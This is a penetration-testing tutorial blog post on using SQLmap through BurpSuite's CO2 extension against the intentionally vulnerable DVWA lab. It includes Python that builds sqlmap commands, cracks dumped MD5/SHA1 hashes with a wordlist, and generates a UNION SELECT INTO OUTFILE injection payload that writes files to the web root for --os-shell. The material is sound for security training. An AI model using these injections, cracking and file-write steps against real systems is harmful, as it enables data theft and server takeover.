SQLmap is an open source penetration testing tool that automates detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine and many features for exploiting the database server: you can use SQLmap to read data from remote databases, access the underlying file system, and even execute commands on the host operating system.
SQLmap supports many database systems, including MySQL, Oracle, PostgreSQL and Microsoft SQL Server. For this blog post I will be using the training VM that was covered in a previous blog post.
For this post we will be focusing on a BurpSuite extension called CO2 (what a burp is comprised of, get it?). This extension was developed by Jason Gillam and contains multiple modules that extend BurpSuite's capabilities. Find the extension in the BurpSuite BApp Store and click the Install button at the bottom of the extension description window. Once installed, an additional CO2 tab is added to the BurpSuite top navigation bar.
To test the CO2 extension we will be using the popular OWASP Damn Vulnerable Web App (DVWA). If you have already set up the training VM as described in the previous blog post you can navigate to http://dvwa.local and be presented with the page shown in the screenshot below. If it is your first time navigating to DVWA, a setup check is required first: click the Create / Reset Database button at the bottom and the application will eventually redirect to the homepage.
To log in to the DVWA application we will use the username:password of
DVWA is configured with multiple security levels, and as your skill set increases you can raise the level to make the exercises harder or add extra hurdles to complete them. For this blog post, though, I recommend navigating to the DVWA Security tab in the navigation menu, choosing the Low setting and clicking Submit. DVWA stores the chosen level in a cookie named security, which is why the cookie from the intercepted request has to travel with every SQLmap request later on.
Next navigate to the SQL Injection page located in the left navigational menu.
Here you can type different entries into the input box and the web application passes the value to the backend database in a query. If you type 1 or 2 you will see the records the database returns for those user IDs.
The screenshot below shows intercepting the search request submitted from the input box. This is the request we want SQLmap to focus on.
Once the request is intercepted, right click anywhere inside the request data window and choose the Send to SQLMapper item.
The CO2 tab should highlight to alert you that data has been added to SQLMapper. Navigate to the CO2 tab and make sure the SQLMapper sub-tab is selected. The screenshot below should be similar to what you currently see. However, we will be changing a few additional options to give SQLMapper more insight or additional attack vectors.
Since this web application is hosted locally on our training VM we can turn up the detection settings. I recommend Level: 3 and Risk: 3. Level (1 to 5) controls how many tests SQLmap performs and which injection points it tries: level 2 adds HTTP Cookie header values and level 3 adds the User-Agent and Referer headers. Risk (1 to 3) controls how aggressive the payloads are: risk 2 adds heavy-query time-based tests and risk 3 adds OR-based boolean tests, which can modify data if the injection lands inside an UPDATE or DELETE statement. Higher settings make the scan slower and more intrusive, not faster. If using SQLmap on a production environment, decide beforehand how much load and risk you are willing to subject the application to so you do not degrade performance or corrupt data.
Under the Options tab we will start by only enumerating the current database (SQLmap's --current-db).
Next we will set the proxy settings under the Connection tab (--proxy=http://127.0.0.1:8080 for Burp's default listener). This is optional, but it routes every request SQLmap makes through BurpSuite so you can view them. Also, if you have followed along with the ELK Stack blog post, it allows SQLmap's traffic to be logged by Elasticsearch.
Finally, navigate back to the main page of SQLMapper, where the full SQLmap command has already been generated. Copy and paste it into a terminal with SQLmap installed to begin the injection process.
You will see the SQLmap banner as the injection enumeration process begins.
As you can see from the screenshot below, the parameter id appears to be injectable.
The screenshot below shows the progress of logging inside the BurpSuite Logger++ extension.
After a few more tests, SQLmap reports that it believes the backend DBMS is MySQL >= 5.5.
From this point we can continue to modify the original SQLmap command, or keep changing the Options menu in the CO2 extension. For this next step we will use SQLmap to list the tables of the MySQL database. Before adding the Tables selection under the Enumeration tab we should set the DBMS under Detection (--dbms=MySQL). This is not required, but it saves SQLmap re-learning what has already been discovered. SQLmap also keeps a session file per target, so on a second run the injection point itself is resumed rather than re-detected unless you pass --flush-session.
The screenshot below shows a sample of the output of the Database Tables.
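The command SQLMapper generates is built from the intercepted request: the URL from the request line and Host header, the cookie (which carries DVWA's security level), and whatever detection and enumeration options were ticked. The following is an added example, not code from the original post, from CO2 or from SQLmap, that rebuilds that command from a saved Burp request, first for the --current-db run and then for the --tables follow-up with the DBMS pinned. The request text is a constructed sample shaped like DVWA's SQL Injection page (the session ID is made up), and the scheme is assumed to be plain http because a saved request does not record whether TLS was used.

```python
# Added example: derive the sqlmap command line from a raw Burp request.
# Not code from the original post, CO2 or sqlmap.
import shlex

# Constructed sample of a request as Burp would save it from DVWA's SQL
# Injection page at Low security (the PHPSESSID value is made up).
SAMPLE_REQUEST = (
    "GET /vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1\r\n"
    "Host: dvwa.local\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Cookie: security=low; PHPSESSID=0123456789abcdef\r\n"
    "Connection: close\r\n"
    "\r\n"
)


def parse_request(raw, scheme="http"):
    """Split a raw HTTP request into the pieces sqlmap needs.

    The raw request does not say whether it was sent over TLS, so the
    scheme is a parameter (Burp knows; a saved file does not).
    """
    text = raw.replace("\r\n", "\n")
    head, _, body = text.partition("\n\n")
    lines = head.split("\n")
    method, target, _version = lines[0].split()
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    if "host" not in headers:
        raise ValueError("request has no Host header; cannot build a URL")
    return {
        "method": method.upper(),
        "url": f"{scheme}://{headers['host']}{target}",
        "cookie": headers.get("cookie"),
        "user_agent": headers.get("user-agent"),
        "data": body.strip() or None,
    }


def sqlmap_argv(req, level=1, risk=1, proxy=None, param=None, dbms=None,
                enum_opts=("--current-db",)):
    """Build the sqlmap argument list for a parsed request.

    level 1-5 and risk 1-3 are sqlmap's own ranges; anything else is
    rejected rather than silently clamped.
    """
    if not 1 <= level <= 5:
        raise ValueError("sqlmap --level must be 1..5")
    if not 1 <= risk <= 3:
        raise ValueError("sqlmap --risk must be 1..3")
    argv = ["sqlmap", "-u", req["url"]]
    if req["data"]:
        argv += ["--data", req["data"]]
    if req["cookie"]:
        # security=low selects the DVWA code path; without the cookie
        # sqlmap would be bounced to the login page instead.
        argv += ["--cookie", req["cookie"]]
    if req["user_agent"]:
        argv += ["--user-agent", req["user_agent"]]
    if param:
        argv += ["-p", param]          # test only this parameter
    if dbms:
        argv += [f"--dbms={dbms}"]     # skip DBMS fingerprinting
    if proxy:
        argv += [f"--proxy={proxy}"]   # route through Burp for logging
    argv += [f"--level={level}", f"--risk={risk}"]
    argv += list(enum_opts)
    return argv


def sqlmap_command(argv):
    """Shell-quoted string ready to paste into a terminal."""
    return shlex.join(argv)


if __name__ == "__main__":
    req = parse_request(SAMPLE_REQUEST)
    # First run: find the injection and name the current database.
    print(sqlmap_command(sqlmap_argv(req, level=3, risk=3,
                                     proxy="http://127.0.0.1:8080")))
    # Second run: DBMS pinned, only the id parameter, list tables.
    print(sqlmap_command(sqlmap_argv(req, level=3, risk=3, param="id",
                                     dbms="MySQL", enum_opts=("--tables",))))
```

Running the script prints the two command lines; the cookie and URL come out single-quoted because they contain characters the shell would otherwise interpret. A POST request from Burp yields a --data argument the same way, and an out-of-range level or risk is refused rather than passed to sqlmap.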
SQLmap also provides built-in functionality to try to dump and crack passwords. Its --passwords switch enumerates the DBMS users' password hashes, and when dumping application tables with --dump it recognises hash-like columns and offers to crack them. In both cases it looks for cleartext values first and then runs a dictionary attack against any hashes it finds.
The screenshot below shows the output of SQLmap using a default wordlist to try and crack the hashes discovered in the MySQL database.
Unfortunately, the default wordlist bundled with SQLmap did not crack the passwords, but the hashes themselves were still dumped. At the cracking prompt SQLmap lets you point it at a custom dictionary file instead of the bundled one, which is the first thing to try when the default list comes up empty.
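To make clear what SQLmap is doing at that prompt and why a small wordlist misses, here is an added example, not code from the original post or from SQLmap, of the same dictionary attack against MD5 hashes (the format DVWA's users table uses), including the optional common-suffix pass SQLmap offers. The user names, passwords and wordlist are all constructed for the example; the hashes are computed inline so the block runs offline.

```python
# Added example of a sqlmap-style dictionary attack on dumped hashes.
# Not code from the original post or from sqlmap.
import hashlib


def digest(algo, word):
    return hashlib.new(algo, word.encode()).hexdigest()


# Constructed sample "dump": made-up users and passwords, hashed here.
# In a real run these values come out of the dumped table.
SAMPLE_HASHES = {
    "alice": digest("md5", "password"),
    "bob": digest("md5", "letmein1"),
    "carol": digest("md5", "tr0ub4dor&3"),
    "dave": digest("sha1", "qwerty"),
}

# Constructed stand-in for a bundled wordlist.
SMALL_WORDLIST = ["123456", "password", "letmein", "qwerty"]
# Suffixes tried when the user accepts the "common password suffixes" prompt.
COMMON_SUFFIXES = ["", "1", "123", "!", "2023"]


def identify_hash(h):
    """Guess the algorithm from length and charset before cracking."""
    if all(c in "0123456789abcdef" for c in h.lower()):
        return {32: "md5", 40: "sha1", 64: "sha256"}.get(len(h))
    return None


def crack(hashes, wordlist, use_suffixes=False):
    """Return {user: cleartext} for every hash found via the dictionary.

    Hashes are grouped by (algorithm, value) so each candidate word is
    hashed once per algorithm, not once per user.
    """
    suffixes = COMMON_SUFFIXES if use_suffixes else [""]
    by_hash = {}
    for user, h in hashes.items():
        algo = identify_hash(h)
        if algo is None:
            continue  # unknown format: left for manual inspection
        by_hash.setdefault((algo, h.lower()), []).append(user)
    algos = {algo for algo, _ in by_hash}
    found = {}
    for word in wordlist:
        for suffix in suffixes:
            candidate = word + suffix
            for algo in algos:
                for user in by_hash.get((algo, digest(algo, candidate)), ()):
                    found[user] = candidate
    return found


if __name__ == "__main__":
    print("plain dictionary:", crack(SAMPLE_HASHES, SMALL_WORDLIST))
    print("with suffixes:   ", crack(SAMPLE_HASHES, SMALL_WORDLIST, use_suffixes=True))
    print("bigger list:     ", crack(SAMPLE_HASHES, SMALL_WORDLIST + ["tr0ub4dor&3"]))
```

The plain pass recovers only the passwords that appear verbatim in the list; the suffix pass picks up the "word plus digit" variants, and anything else stays uncracked until a larger dictionary is supplied, which is exactly the situation in the screenshot above.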
The final attack vector demonstrated is using SQLmap to execute code on the victim machine in order to obtain an interactive shell. I have not found an option for an OS shell inside CO2, so we will reuse the previous command format and add the final parameter --os-shell, which tells SQLmap to write a small web stager to a file on the remote machine and then call that file over HTTP to run commands. On MySQL the file is written with SELECT ... INTO OUTFILE / INTO DUMPFILE, so the database user needs the FILE privilege, secure_file_priv must not block the target directory, and the directory must be writable by the operating system user the MySQL server runs as (not the web server's user). INTO OUTFILE also refuses to overwrite an existing file.
Walking through the prompts we can answer the questions needed for SQLmap to stage the shell. The first question is which language to use; this must be the language the web application is written in. Using prior knowledge we know the application is written in PHP, so we can leave the default selection. SQLmap then asks for a writable web directory and by default tries common locations such as /var/www. If all goes well SQLmap returns an interactive shell.
I'm not sure if the os-shell fails because Docker is not configured with enough disk space to hold the shell or the www-data user does not have the correct write permissions on the disk. I will investigate later.
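The quickest way to settle that question is to try the file write on its own, with a harmless probe instead of a shell, and to check secure_file_priv first. The following is an added example, not code from the original post or from SQLmap, of the INTO OUTFILE write that --os-shell relies on for MySQL, reduced to that probe. It assumes DVWA's Low-security query selects two columns and quotes the id (an assumption taken from DVWA's source), and a web root of /var/www/html, which is a guess you replace with the real path.

```python
# Added example: the INTO OUTFILE write behind sqlmap's --os-shell on MySQL,
# as a harmless write probe plus the secure_file_priv rule.
# Not code from the original post or from sqlmap.


def hex_literal(data):
    """MySQL 0x... literal: needs no quotes, so it survives quote handling."""
    return "0x" + data.hex()


def into_outfile_payload(column_count, target_path, content,
                         quote="'", comment="-- -"):
    """UNION payload that writes `content` to `target_path` via INTO OUTFILE.

    column_count must match the injected SELECT. DVWA Low selects
    first_name, last_name (two columns, assumed from DVWA's source), so the
    content goes in column one and the rest are NULL. MySQL writes NULL as
    \\N with tab separators, which is just trailing text after ?> in PHP.
    The leading quote closes the original string literal; the comment
    discards the query's closing quote.
    """
    if column_count < 1:
        raise ValueError("need at least one column")
    columns = [hex_literal(content)] + ["NULL"] * (column_count - 1)
    return (f"{quote} UNION SELECT {','.join(columns)} "
            f"INTO OUTFILE '{target_path}'{comment}")


def outfile_allowed(secure_file_priv, target_path):
    """Apply MySQL's secure_file_priv rule (SELECT @@secure_file_priv).

    None  -> NULL: file import/export disabled entirely
    ""    -> no restriction
    dir   -> writes allowed only inside that directory
    Even when allowed, the directory must be writable by mysqld's OS user
    and the file must not already exist.
    """
    if secure_file_priv is None:
        return False
    if secure_file_priv == "":
        return True
    base = secure_file_priv.rstrip("/") + "/"
    return target_path.startswith(base)


if __name__ == "__main__":
    # Hypothetical web root; the real one is whatever sqlmap's prompt needs.
    target = "/var/www/html/probe.txt"
    probe = b"written by mysqld"
    print(into_outfile_payload(2, target, probe))
    for setting in (None, "", "/var/lib/mysql-files"):
        print(repr(setting), "->", outfile_allowed(setting, target))
```

Send the payload as the id value (sqlmap's --sql-query with SELECT @@secure_file_priv tells you which branch of outfile_allowed applies), then request the probe file over HTTP. If it is not there despite FILE privilege and a permissive secure_file_priv, the write is failing at the filesystem level: either the directory is not writable by the MySQL server's user, or MySQL runs in a separate container or host from the web server, in which case the file lands on the database's filesystem and no web root path will ever work.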
Time to SQLmap All The Things!